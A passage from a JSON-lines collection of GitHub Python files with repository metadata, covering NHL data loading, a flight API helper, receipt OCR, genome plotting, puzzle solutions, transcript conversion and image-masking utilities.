'position'])\n position_df.set_index('index', inplace=True)\n\n player_w_position = pd.merge(player_info_df, \n position_df, \n left_index=True,\n right_index=True,\n suffixes=['_old', ''])\n else:\n player_w_position = player_info_df.copy()\n player_w_position['position'] = None\n \n # Remove remaining dicts from dataframe\n if 'currentTeam' in player_w_position.columns:\n player_w_position.drop(\n ['currentTeam'], \n axis=1,\n inplace=True)\n if 'primaryPosition' in player_w_position.columns:\n player_w_position.drop(\n [ 'primaryPosition'],\n axis=1,\n inplace=True)\n player_w_position.rename(columns={'id': 'player_id'}, inplace=True)\n\n return player_w_position\n\n\ndef get_player_data():\n\n player_games = import_data_from_sql('game_players')\n player_info = import_data_from_sql('player_info')\n\n player_info_not_na = player_info[~player_info['firstName'].isna()]\n\n if player_games.empty :\n logger.info('No games have been processed.')\n return None\n elif player_info_not_na.empty:\n logger.info('No player info has been downloaded. Processing all players')\n players_ids = player_games[['player_id']].drop_duplicates()\n else:\n players_unique = player_games[['player_id']].drop_duplicates()\n players_ids = players_unique[~players_unique['player_id'].isin(\n player_info_not_na['player_id'])]\n\n # Get player data \n for _, player in tqdm(players_ids.iterrows(), total=players_ids.shape[0]):\n print(player['player_id'])\n player_info_updated = get_player_info(player)\n\n if player_info_updated is not None:\n player_info_updated_cleaned = player_info_updated[~player_info_updated['firstName'].isna()]\n if not player_info_updated_cleaned.empty:\n insert_into_db(\n player_info_updated_cleaned[player_info_cols], 'player_info')\n\n\n \n", "repo_name": "lmanzer/nhl_analysis", "sub_path": "src/nhl_api/get_player_info.py", "file_name": "get_player_info.py", "file_ext": "py", "file_size_in_byte": 3814, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.set_option", "line_number": 15, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 17, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 30, "usage_type": "call"}, {"api_name": "settings.DATABASE_NAME", "line_number": 30, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 38, "usage_type": "call"}, {"api_name": "misc_functions.get_json_data_from_link", "line_number": 42, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 61, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 65, "usage_type": "call"}, {"api_name": "misc_functions.import_data_from_sql", "line_number": 92, "usage_type": "call"}, {"api_name": "misc_functions.import_data_from_sql", "line_number": 93, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 109, "usage_type": "call"}, {"api_name": "misc_functions.insert_into_db", "line_number": 116, "usage_type": "call"}]} +{"seq_id": "6728447208", "text": "import requests\nimport json\nimport pandas as pd\n\n#INITIALISE\nwith open('keyfile') as keyfile:\n API_KEY = keyfile.read()\n\n# lambda for quick jupyter representation of a plane\nuseful_details = ['Source',\n 'Destination',\n 'alt',\n 'reg_number',\n 'flag',\n ]\nshow_frame = lambda df : df[useful_details].sort_values(['alt','Destination'])\n\n# If no bounding box provided, uses London\nLONDON_BOX = (51.15,-0.91,51.96,0.39)\n\n# Requests\nURL = 'https://airlabs.co/api/v9/'\nendpoint = lambda e: URL + e\n\n# Get Static Data\nwith open('airports.json') as airport_data:\n airports = json.load(airport_data)\n\n# Dictionary for turning iata_codes into airport names\n#TO DO: add cities to this\ncodes = {ap['iata_code']:ap['name'] \n for ap in airports if 'iata_code' in ap.keys()\n }\n\ndef get_local_airports(bbox=LONDON_BOX):\n output = []\n for ap in airports:\n if (bbox[0] 3.5 * taille de l'image\n\n if contours_image.si_image_bien_cadre(image, contours):\n\n # wrap_perspective\n img_redresse = imgutils.wrap_perspective(base.copy(), imgutils.contour_to_rect(rect))\n if display_image: imgutils.affiche(img_redresse)\n\n image_final = traitement_image.traitement_apres_recadrage_2(img_redresse)\n # affiche_total\n total = affiche_total(image_final)\n if display_image: ocr.affiche_rectangle_paddle(image_final, (0, 255, 0), 2)\n\n # ==================== Pas de recadrage d'image ===========================\n # si cadre détecté < 3.5 * taille de l'image\n\n else:\n image_final = traitement_image.traitement_apres_recadrage_2(base)\n # --- lecture image ------\n total = affiche_total(image_final)\n if display_image: ocr.affiche_rectangle_paddle(image_final, (0, 255, 0), 2)\n\n return total\n\n# ----------------------------------------------------------------------------------------------------------------------\n# Test le programme sur un dataset\n# ----------------------------------------------------------------------------------------------------------------------\n\ndef table_comparaison():\n df = pd.read_csv(\"table/table_de_verification_dataset.csv\", sep=';')\n for i in range(len(df)):\n num = df.loc[i, 'numero']\n print(num)\n try:\n total = main(\"dataset/\" + str(num) + \"-receipt.jpg\", False)\n # total = main(\"data_2/\" + str(num) +\".jpg\", False) #2\n except:\n total = '0'\n df.loc[i, 'total_obtenu'] = total\n df[\"result\"] = df.apply(lambda row: True if float(row[\"total\"]) == float(row[\"total_obtenu\"]) else False, axis=1)\n count = df['result'].value_counts()\n vrai = len(df[df['result'] == True])\n print('pourcentage', (int(vrai) / len(df)) * 100)\n print(df)\n print(count)\n\n# ----------------------------------------------------------------------------------------------------------------------\n# Chronomètre + Lancement fonction\n# ----------------------------------------------------------------------------------------------------------------------\n\nstart = time.time()\n\n#print(\"LE TOTAL EST : \", main(\"data/sample.jpg\", True))\n#table_comparaison()\n\nend = time.time()\nexecutionTime = end - start\nprint('Temps d\\'exécution : ', executionTime, ' s')\n", "repo_name": "maelle9/Lecture-automatique-de-facture", "sub_path": "main_traitement.py", "file_name": "main_traitement.py", "file_ext": "py", "file_size_in_byte": 3345, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "traitement_image.silhouette", "line_number": 13, "usage_type": "call"}, {"api_name": "imgutils.affiche", "line_number": 14, "usage_type": "call"}, {"api_name": "contours_image.extraction_contour", "line_number": 17, "usage_type": "call"}, {"api_name": "imgutils.affiche", "line_number": 18, "usage_type": "call"}, {"api_name": "contours_image.ten_contours", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 22, "usage_type": "call"}, {"api_name": "imgutils.affiche", "line_number": 23, "usage_type": "call"}, {"api_name": "imgutils.get_receipt_contour", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 27, "usage_type": "call"}, {"api_name": "imgutils.affiche", "line_number": 28, "usage_type": "call"}, {"api_name": "contours_image.si_image_bien_cadre", "line_number": 33, "usage_type": "call"}, {"api_name": "imgutils.wrap_perspective", "line_number": 36, "usage_type": "call"}, {"api_name": "imgutils.contour_to_rect", "line_number": 36, "usage_type": "call"}, {"api_name": "imgutils.affiche", "line_number": 37, "usage_type": "call"}, {"api_name": "traitement_image.traitement_apres_recadrage_2", "line_number": 39, "usage_type": "call"}, {"api_name": "find_total_amount.affiche_total", "line_number": 41, "usage_type": "call"}, {"api_name": "ocr.affiche_rectangle_paddle", "line_number": 42, "usage_type": "call"}, {"api_name": "traitement_image.traitement_apres_recadrage_2", "line_number": 48, "usage_type": "call"}, {"api_name": "find_total_amount.affiche_total", "line_number": 50, "usage_type": "call"}, {"api_name": "ocr.affiche_rectangle_paddle", "line_number": 51, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 60, "usage_type": "call"}, {"api_name": "time.time", "line_number": 81, "usage_type": "call"}, {"api_name": "time.time", "line_number": 86, "usage_type": "call"}]} +{"seq_id": "71360384169", "text": "\"\"\"Plots the distribution of variants across the genome, stained by data source.\"\"\"\n\nimport argparse\nimport pathlib\nimport pandas as pd\n\n# plotting\nfrom matplotlib import pyplot as plt\nfrom matplotlib.collections import BrokenBarHCollection\nfrom matplotlib.lines import Line2D\n\n\ndef chromosome_collections(df, y_positions, height, **kwargs):\n \"\"\"\n Yields BrokenBarHCollection of features that can be added to an Axes\n object.\n Parameters\n ----------\n df : pandas.DataFrame\n Must at least have columns ['chrom', 'start', 'end', 'color']. If no\n column 'width', it will be calculated from start/end.\n y_positions : dict\n Keys are chromosomes, values are y-value at which to anchor the\n BrokenBarHCollection\n height : float\n Height of each BrokenBarHCollection\n Additional kwargs are passed to BrokenBarHCollection\n \"\"\"\n del_width = False\n if 'width' not in df.columns:\n del_width = True\n df['width'] = df['end'] - df['start']\n for chrom, group in df.groupby('chrom'):\n yrange = (y_positions[chrom], height)\n xranges = group[['start', 'width']].values\n yield BrokenBarHCollection(\n xranges, yrange, facecolors=group['colors'], **kwargs)\n if del_width:\n del df['width']\n\n\ndef plot_chromsome_distribution(ideo,variants,ax):\n # Height of each ideogram\n chrom_height = 0.5\n\n # Spacing between consecutive ideograms\n chrom_spacing = 1\n\n # Height of the variant track. Should be smaller than `chrom_spacing` in order to\n # fit correctly\n variant_height = 0.8\n\n # Padding between the top of a gene track and its corresponding ideogram\n variant_padding = 0.1\n\n # Decide which chromosomes to use\n chromosome_list = ['chr%s' % i for i in range(1, 23)]\n\n # Keep track of the y positions for ideograms and genes for each chromosome,\n # and the center of each ideogram (which is where we'll put the ytick labels)\n ybase = 0\n chrom_ybase = {}\n variant_ybase = {}\n chrom_centers = {}\n\n # Iterate in reverse so that items in the beginning of `chromosome_list` will\n # appear at the top of the plot\n for chrom in chromosome_list[::-1]:\n chrom_ybase[chrom] = ybase\n chrom_centers[chrom] = ybase + chrom_height / 2.\n variant_ybase[chrom] = ybase - variant_height - variant_padding\n ybase += chrom_height + chrom_spacing\n\n # Filter out chromosomes not in our list\n ideo = ideo[ideo['chrom'].apply(lambda x: x in chromosome_list)]\n\n # Add a new column for width\n ideo['width'] = ideo.end - ideo.start\n\n # Colors for different chromosome stains and variant sources\n color_lookup_ideogram = {\n 'gneg': (1., 1., 1.),\n 'gpos25': (.6, .6, .6),\n 'gpos50': (.4, .4, .4),\n 'gpos75': (.2, .2, .2),\n 'gpos100': (0., 0., 0.),\n 'acen': (.8, .4, .4),\n 'gvar': (.8, .8, .8),\n 'stalk': (.9, .9, .9),\n }\n\n color_lookup_variants = {\n 'GnomAD': '#e01b22',\n 'Eichler': '#22e01b',\n 'Biobank': '#1b28e0',\n 'DGV': '#e07a1b'\n }\n\n # Add a new column for colors\n ideo['colors'] = ideo['gieStain'].apply(lambda x: color_lookup_ideogram[x])\n\n # Same thing for the variants\n variants = variants[variants['chrom'].apply(lambda x: x in chromosome_list)]\n variants['width'] = variants.end - variants.start\n variants['colors'] = variants['origin'].apply(\n lambda x: color_lookup_variants[x])\n\n # Now all we have to do is call our function for the ideogram data...\n for collection in chromosome_collections(ideo, chrom_ybase, chrom_height, linewidths=1, edgecolors='black'):\n ax.add_collection(collection)\n\n # ...and the gene data\n for collection in chromosome_collections(\n variants, variant_ybase, variant_height, alpha=0.5, linewidths=0\n ):\n ax.add_collection(collection)\n\n # add custom legend\n custom_lines = [Line2D([0], [0], color=color_lookup_variants['GnomAD'], lw = 3),\n Line2D([0], [0], color=color_lookup_variants['Eichler'], lw = 3),\n Line2D([0], [0], color=color_lookup_variants['Biobank'], lw = 3),\n Line2D([0], [0], color=color_lookup_variants['DGV'], lw = 3)]\n\n ax.legend(custom_lines, ['GnomAD', 'Eichler', 'Biobank', 'DGV'],loc='lower right')\n\n # Axes tweaking\n ax.set_yticks([chrom_centers[i] for i in chromosome_list])\n ax.set_yticklabels(chromosome_list)\n ax.axis('tight')\n return ax\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "jakob-he/TADA", "sub_path": "manuscript/SCRIPTS/chromosome_plot.py", "file_name": "chromosome_plot.py", "file_ext": "py", "file_size_in_byte": 4559, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.collections.BrokenBarHCollection", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.lines.Line2D", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.lines.Line2D", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.lines.Line2D", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.lines.Line2D", "line_number": 122, "usage_type": "call"}]} +{"seq_id": "23702820719", "text": "import time\n\nstart = time.time()\n\nfrom math import prod\n\nfrom fractions import Fraction as simplest_form\n\nnumerators = []\n\ndenominators = []\n\nfor n in range(10, 100):\n for d in range(n + 1, 100):\n f = n / d\n for a in str(n):\n for b in str(d):\n if int(a) == int(b) and int(a) != 0:\n new_n = str(n).replace(a, '', 1)\n new_d = str(d).replace(b, '', 1)\n if int(new_d) != 0 and int(new_n) / int(new_d) == f:\n numerators.append(n)\n denominators.append(d)\n break\n\nsolution = simplest_form(prod(numerators), prod(denominators))\n\nprint(solution)\n\nend = time.time()\n\n# Executes in 0.0310 seconds\nprint(end - start)\n", "repo_name": "Cikguseven/Project-Euler", "sub_path": "Solutions/33.py", "file_name": "33.py", "file_ext": "py", "file_size_in_byte": 770, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "time.time", "line_number": 3, "usage_type": "call"}, {"api_name": "fractions.Fraction", "line_number": 26, "usage_type": "call"}, {"api_name": "math.prod", "line_number": 26, "usage_type": "call"}, {"api_name": "time.time", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "35452538855", "text": "\n# https://leetcode-cn.com/problems/subsets/\n\n# https://leetcode-cn.com/problems/subsets/solution/zi-ji-by-leetcode/\n\n\n# https://leetcode-cn.com/problems/subsets/solution/hui-su-si-xiang-tuan-mie-pai-lie-zu-he-zi-ji-wen-t/\n\nfrom typing import List\n\nclass Solution:\n # 递归\n def subsets(self, nums: List[int]) -> List[List[int]]:\n n = len(nums)\n output = [[]]\n\n for num in nums:\n tmp = []\n for curr in output:\n tmp = tmp + [curr + [num]]\n output = output + tmp\n return output\n\n # 回溯\n # 幂集是所有长度从 0 到 n 所有子集的组合。\n # 回溯法是一种探索所有潜在可能性找到解决方案的算法。如果当前方案不是正确的解决方案,\n # 或者不是最后一个正确的解决方案,则回溯法通过修改上一步的值继续寻找解决方案。\n def subsetsII(self, nums:List[int]):\n def backtrack(first=0, curr=[]):\n if len(curr) == k:\n output.append(curr[:])\n\n for i in range(first, n):\n curr.append(nums[i])\n backtrack(i+1, curr)\n curr.pop()\n\n output = []\n n = len(nums)\n for k in range(n+1):\n backtrack()\n return output\n\n # bit\n def subsetsIII(self, nums:List[int]):\n n = len(nums)\n output = []\n\n for i in range(2 ** n, 2**(n+1)):\n bitmask = bin(i)[3:]\n output.append([nums[j] for j in range(n) if bitmask[j] == '1'])\n\n return output\n\n\n\n\ns = Solution()\nprint(s.subsetsIII(nums=[1,2,3]))", "repo_name": "azhu51/leetcode-practice", "sub_path": "top_interview/medium_array_78.py", "file_name": "medium_array_78.py", "file_ext": "py", "file_size_in_byte": 1462, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.List", "line_number": 13, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 45, "usage_type": "name"}]} +{"seq_id": "72032123369", "text": "#!/usr/bin/env python3\n\nimport sys, os, subprocess\nfrom fileinput import FileInput\nimport os.path\nfrom datetime import datetime, timedelta\nfrom pathlib import Path\n\n# arguments to this script:\n# - meeting number\n# - real time HH:MM when recording starts\n# - crs_id/semester of offering\nif (len(sys.argv) != 4):\n print (sys.argv[0],\"must be invoked with crs_id/semester, meeting-number, astart-time (HH:MM), and \")\n sys.exit()\n\nmtg_nbr = str(sys.argv[2]).zfill(2)\n\n# CS-428+828/202030 5 11:10\n# teaching/CS-428+828/202030/0_nonweb/zoom/talk/05*.srt\n# _data/teaching/CS-428_828/202030/transcript/talk/05.yml\n\nTALK_SRC = 'teaching/' + sys.argv[1] + '/0_nonweb/zoom/talk/' + mtg_nbr + '_otter.ai.srt'\nprint(TALK_SRC)\nTALK_DST = '_data/teaching/' + sys.argv[1].replace('+','_') + '/transcript/talk/' + mtg_nbr + '.yml'\nprint(TALK_DST)\nstarttime = sys.argv[3].split(':')\nstd = timedelta(hours=int(starttime[0]),minutes=int(starttime[1]))\n#atfilepath = sys.argv[2]\n\nwith open(TALK_SRC,'r') as atf, open(TALK_DST, 'w') as ydf:\n curr_hm_stamp = ''\n curr_speaker = ''\n new_block = 0\n for line in atf:\n line = line.strip()\n if (len(line)):\n #print(line)\n if '-->' in line:\n #print ('case: -->')\n startstop = line.split(' ')\n #print(startstop)\n #ydf.write(str(startstop) + '\\n')\n try:\n ts0 = std + datetime.strptime(startstop[0],'%H:%M:%S.%f')\n except:\n ts0 = std + datetime.strptime(startstop[0],'%H:%M:%S,%f')\n if curr_hm_stamp != ts0.strftime('%Hh%M'):\n new_block = 1\n ydf.write(ts0.strftime('%Hh%M') + ':\\n')\n ydf.write(' talks:\\n')\n curr_hm_stamp = ts0.strftime('%Hh%M')\n elif ':' in line:\n #print ('case: :')\n spoken = line.split(':')\n #print(spoken)\n if new_block == 1 or curr_speaker != spoken[0]:\n #spkr = 'SSS'\n #if (spoken[0] == 'Daryl Hepting' or spoken[0] == 'Unknown'):\n ydf.write(' - persid: ' + spoken[0] + '\\n')\n #else:\n #ydf.write(' - persid: SSS\\n')\n ydf.write(' msg: >-\\n')\n curr_speaker = spoken[0]\n #print (' \\\"' + spoken[1])\n #for i in range(2,len(spoken)):\n # print (' ' + spoken[i])\n new_block = 0\n for i in range(1,len(spoken)):\n ydf.write (' ' + spoken[i].strip() + '\\n')\n elif len(line.strip().split()) > 1 or not line.isnumeric():\n #print ('case: len(line.strip().split()) > 1 or line.isalpha()')\n if new_block == 1 :#or curr_speaker != spoken[0]:\n ydf.write(' - persid: ' + spoken[0] + '\\n')\n ydf.write(' msg: >-\\n')\n new_block = 0\n ydf.write (' ' + line.strip() + '\\n')\n", "repo_name": "dhhepting/dhhepting.github.io", "sub_path": "script/000_not-needed/transcribe-talk.py", "file_name": "transcribe-talk.py", "file_ext": "py", "file_size_in_byte": 3122, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.argv", "line_number": 13, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 14, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 15, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 17, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 23, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 25, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 27, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 45, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 45, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 47, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 47, "usage_type": "name"}]} +{"seq_id": "8547586610", "text": "import torch\nimport torch.nn.functional as F\nimport torchvision\nimport os\nfrom imagegym.config import cfg\nimport numpy as np\nimport torch\n\ndef create_fixed_mask_missingness(shape:tuple):\n \"\"\"\n use only for chairs dataset since it is always sampling 4096 points\n \"\"\"\n # assert len(x.shape) == 5 #so this is chairs\n bs, ch, h, w, d = shape\n observed_indices = random_indices(4096,h*w*d).unsqueeze(0)\n all = torch.zeros((h*w*d),dtype=bool).flatten()\n all[observed_indices]=True\n observed_mask = all.reshape(h,w,d)\n\n # observed_mask = torch.zeros_like(x,dtype=bool)\n # observed_mask[:,:,observed_indices]=True\n observed_mask = np.tile(observed_mask[np.newaxis,np.newaxis], (bs,ch,1,1,1))\n observed_mask_point = observed_mask[:,0].reshape(observed_mask.shape[0],-1) #bs,h*w\n return observed_mask, observed_mask_point\n \n\ndef random_indices(num_indices, max_idx):\n \"\"\"Generates a set of num_indices random indices (without replacement)\n between 0 and max_idx - 1.\n\n Args:\n num_indices (int): Number of indices to include.\n max_idx (int): Maximum index.\n \"\"\"\n # It is wasteful to compute the entire permutation, but it looks like\n # PyTorch does not have other functions to do this\n permutation = torch.randperm(max_idx)\n # Select first num_indices indices (this will be random since permutation is\n # random)\n return permutation[:num_indices]\n\n\ndef create_mask_missingness(x, missingness):\n \"\"\"\n :param x: input tensor of batch\n :param missingness: missingness value float\n :return: x with missingness applied\n :return: observed mask of non-missingness\n \"\"\" \n if missingness == 1:\n missing_rate = np.random.rand(1) * 0.9 \n elif missingness > 0:\n missing_rate = missingness\n missing_rate = np.random.uniform(low=0,high=missing_rate)\n elif missingness ==0:\n missing_rate = -1\n\n if len(x.shape) == 3: #shapenet\n raise NotImplementedError\n bs, h, ch = x.shape\n w=1\n observed_mask_0 = (np.random.rand(h*w)) > missing_rate\n observed_mask = np.tile(observed_mask_0[np.newaxis, :, np.newaxis], (bs,1,ch))\n observed_mask_point= None\n\n elif len(x.shape) == 4:\n bs, ch, h, w = x.shape\n observed_mask_0 = (np.random.rand(h,w)) > missing_rate\n observed_mask = np.tile(observed_mask_0[np.newaxis,np.newaxis], (bs,ch,1,1))\n observed_mask_point = observed_mask[:,0].reshape(observed_mask.shape[0],-1) #bs,h*w\n\n\n elif len(x.shape) == 5: #chairs\n observed_mask, observed_mask_point = create_fixed_mask_missingness(x.shape) \n # bs, ch, h, w, d = x.shape\n # observed_mask_0 = (np.random.rand(h,w,d)) > missing_rate\n # observed_mask = np.tile(observed_mask_0[np.newaxis,np.newaxis], (bs,ch,1,1,1))\n # observed_mask_point= None\n \n else:\n raise NotImplementedError\n \n # observed_mask_0 = (np.random.rand(h,w)) > missing_rate\n # #TODO change this it fill fail, maybe we can use cfg to get the right dims\n # observed_mask = np.tile(observed_mask_0[np.newaxis,np.newaxis], (bs,ch,1,1))\n \n return x, observed_mask, observed_mask_point\n\ndef mask_to_input(self, input:torch.Tensor, mask:torch.Tensor)-> torch.Tensor:\n '''\n Args:\n input (torch.Tensor): Shape (batch_size, num_points, coordinate_dim or channel_dim).\n coor_mask (torch.Tensor): Shape (batch_size, num_points).\n Returns:\n missing_input (torch.Tensor): Shape (batch_size, num_points_not_masked,coordinate_dim or channel_dim)\n '''\n missing_input = input[mask,:].reshape(input.shape[0],-1,input.shape[2])\n return missing_input\n\n\ndef compute_occlusion_mask(input_size, occlusion_type: str, occlusion_size: int):\n \"\"\"\n Args:\n input_size (tuple): Size of the input image, WxH.\n occlusion_for_task (str): Type of task for getting occlusion\n occlusion_size (tuple): Starting index, Size of the occlusion.\n Returns:\n mask (torch.Tensor): Mask of shape (*input_size).\n \"\"\"\n\n\n # w,h = input_size\n if occlusion_type is None:\n occlusion_mask = torch.ones(*input_size,dtype=bool) #bogus\n return occlusion_mask\n\n index, size = occlusion_size\n number_of_axis = len(input_size)\n\n #occlusion mask is 1s everywhere, 0 at occluded place\n\n if number_of_axis==2:\n if occlusion_type == \"inpainting\":\n occlusion_mask = torch.ones(*input_size,dtype=bool)\n occlusion_mask[index:index+size,index:index+size] = False\n\n elif occlusion_type == \"outpainting\":\n occlusion_mask = torch.zeros(*input_size,dtype=bool)\n occlusion_mask[index:index+size,index:index+size] = True\n\n elif occlusion_type == \"half\":\n occlusion_mask = torch.zeros(*input_size,dtype=bool)\n occlusion_mask[:,:input_size[-1]//2] = True\n \n elif number_of_axis==3:\n if occlusion_type == \"inpainting\":\n occlusion_mask = torch.ones(*input_size,dtype=bool)\n occlusion_mask[index:index+size,index:index+size,index:index+size] = False\n\n elif occlusion_type == \"outpainting\":\n occlusion_mask = torch.zeros(*input_size,dtype=bool)\n occlusion_mask[index:index+size,index:index+size,index:index+size] = True\n\n elif occlusion_type == \"half\":\n occlusion_mask = torch.zeros(*input_size,dtype=bool)\n occlusion_mask[:,:,:input_size[-1]//2] = True\n \n else:\n raise NotImplementedError\n\n return occlusion_mask\n\ndef apply_occlusion_mask(coordinates:torch.Tensor, features:torch.Tensor, mask: torch.Tensor):\n '''\n Args:\n coordinates (torch.Tensor): Shape (batch_size, num_points, coordinate_dim)\n features (torch.Tensor): Shape (batch_size, num_points, channel_dim)\n mask (torch.Tensor): Shape (*dim).\n Returns:\n coordinates (torch.Tensor): Shape (batch_size, num_points_not_masked, coordinate_dim).\n features (torch.Tensor): Shape (batch_size, num_points_not_masked, channel_dim).\n '''\n \n coors_masked = coordinates[:, mask.flatten(), :] # [bs, num_points_not_masked, coordinate_dim]\n features_masked = features[:, mask.flatten(), :] # [bs, num_points_not_masked, channel_dim]\n\n return coors_masked, features_masked\n\n#NOT USED\ndef compute_mask_mar(batch, is_training):\n assert cfg.dataset.missing_perc>0\n bs = batch.shape[0]\n if is_training:\n if cfg.dataset.name in [\"shapenet\"]:\n mask = batch[0,:,[0]].expand(bs,-1,-1) #torch.Size([8, 6000, 1])\n mask_point = mask[:,:,0].reshape(mask.shape[0],-1) #bs,h*w\n elif cfg.dataset.name in [\"voxels\"]:\n mask = batch[0].expand(bs,-1,-1,-1,-1) #[bs,1,32,32,32]\n mask_point = mask[:,0].reshape(mask.shape[0],-1) #bs,h*w\n else:\n mask = batch[0].expand(bs,-1,-1,-1) #[bs,ch,h,w]\n mask_point = mask[:,0].reshape(mask.shape[0],-1) #bs,h*w\n else:\n if cfg.dataset.name in [\"shapenet\"]:\n mask = torch.ones_like(batch[0,:,[0]].expand(bs,-1,-1))\n mask_point = mask[:,:,0].reshape(mask.shape[0],-1) #bs,h*w\n elif cfg.dataset.name in [\"voxels\"]:\n mask = torch.ones_like(batch[0].expand(bs,-1,-1,-1,-1))#torch.Size([4, 1, 4096])\n mask_point = mask[:,0].reshape(mask.shape[0],-1) #bs,h*w\n else:\n mask = torch.ones_like(batch[0]).expand(bs,-1,-1,-1) #[bs,ch,h,w]\n mask_point = mask[:,0].reshape(mask.shape[0],-1) #bs,h*w\n return mask, mask_point\n\n\ndef bbox2mask(self, bbox):\n \"\"\"Generate mask tensor from bbox.\n Args:\n bbox: configuration tuple, (top, left, height, width)\n config: Config should have configuration including IMG_SHAPES,\n MAX_DELTA_HEIGHT, MAX_DELTA_WIDTH.\n Returns:\n tf.Tensor: output with shape [B, 1, H, W]\n \"\"\"\n def npmask(bbox, ch, height, width, delta_h, delta_w):\n mask = np.zeros((1, ch, height, width), np.float32)\n # h = np.random.randint(delta_h//2+1)\n # w = np.random.randint(delta_w//2+1)\n h=delta_h\n w=delta_w\n mask[:, :, bbox[0] : bbox[0]+bbox[2],\n bbox[1] : bbox[1]+bbox[3]] = 1.\n return mask\n\n img_shape =cfg.dataset.dims\n height = img_shape[1]\n width = img_shape[2]\n\n mask = npmask(bbox, 1, height, width, 5, 5)\n \n return torch.FloatTensor(mask)\n \ndef compute_neighbors(bs,K,res,pi):\n #res is the bigger one\n #res_org = (res+1)//2\n # bs = x_rec.shape[0]\n # K = x_rec.shape[-1]\n # res = x_rec.shape[-2]\n pi = pi.permute(0,2,1).reshape(bs,K,res,res)\n conv2d = torch.nn.Conv2d(in_channels=K, out_channels=K, kernel_size=3, stride=2, bias=False,groups=K)\n weight = torch.zeros((K, 1, 3, 3),dtype=torch.float).to(cfg.device)\n # print(weight)\n weight[:,:,0,0]=1\n weight[:,:,0,-1]=1\n weight[:,:,-1,0]=1\n weight[:,:,-1,-1]=1\n # weight.requires_grad=False\n # print(weight)\n conv2d.weight = torch.nn.Parameter(weight)\n conv2d.weight.requires_grad=False\n a = conv2d(pi).detach()\n centers = np.arange(1,res,2)\n pi2 = impute_findings(a,pi,centers)\n\n conv2d2 = torch.nn.Conv2d(in_channels=K, out_channels=K, kernel_size=3, stride=1, bias=False, groups=K, padding=1)\n weight = torch.zeros((K, 1, 3, 3),dtype=torch.float).to(cfg.device)\n # print(weight)\n weight[:,:,0,1]=1\n weight[:,:,1,0]=1\n weight[:,:,1,-1]=1\n weight[:,:,-1,1]=1\n # weight.requires_grad=False\n # print(weight)\n conv2d2.weight = torch.nn.Parameter(weight)\n conv2d2.weight.requires_grad=False\n b = conv2d2(pi2).detach()\n centers = np.arange(1,res,2)\n # print(centers)\n centers2 = np.arange(0,res,2)\n # print(centers2)\n pi3 = impute_findings2(b,pi2,centers,centers2)\n return pi3\n\n\ndef impute_findings(source,target,centers):\n for x in centers:\n for y in centers:\n # print(x,y)\n # print((x-1)//2,(y-1)//2)\n target[:,:,x,y] = source[:,:,(x-1)//2,(y-1)//2]/4\n return target\n\ndef impute_findings2(source,target,centers,centers2):\n for x in centers:\n for y in centers2:\n # print(x,y)\n if y==0 or y==centers2[-1]:\n dividend = 3\n else:\n dividend = 4 \n target[:,:,x,y] = source[:,:,x,y]/dividend\n target[:,:,y,x] = source[:,:,y,x]/dividend\n return target\n\ndef neighborhood_filling(centers, prior_imputed_1:torch.Tensor, scale_pixels:int, kernel_size:int=3):\n #prior_imputed_1: (bs,all,K)\n #prior_imputed_1 = reshape\n kernel = np.zeros((scale_pixels+1,scale_pixels+1))\n kernel[0,0]=1\n kernel[0,-1]=1\n kernel[-1,0]=1\n kernel[-1,-1]=1\n kernel = np.asarray(kernel,dtype=bool)\n\n for x in centers-1:\n for y in centers-1:\n image = prior_imputed_1[:,x-scale_pixels//2:x+scale_pixels//2+1,y-scale_pixels//2:y+scale_pixels//2+1]\n result = image[:,kernel]\n values, counts = np.unique(result, return_counts=True)\n ind = np.argmax(counts)\n prior_imputed_1[x,y] = values[ind]\n\n return prior_imputed_1\n\ndef neighborhood_filling_2(centers, prior_imputed_1:torch.Tensor, scale_pixels:int, kernel_size:int=3):\n kernel = np.zeros((scale_pixels+1,scale_pixels+1))\n kernel[0,0]=1\n kernel[0,-1]=1\n kernel[-1,0]=1\n kernel[-1,-1]=1\n kernel = np.asarray(kernel,dtype=bool)\n \n for x in centers-1:\n for y in centers-1:\n image = 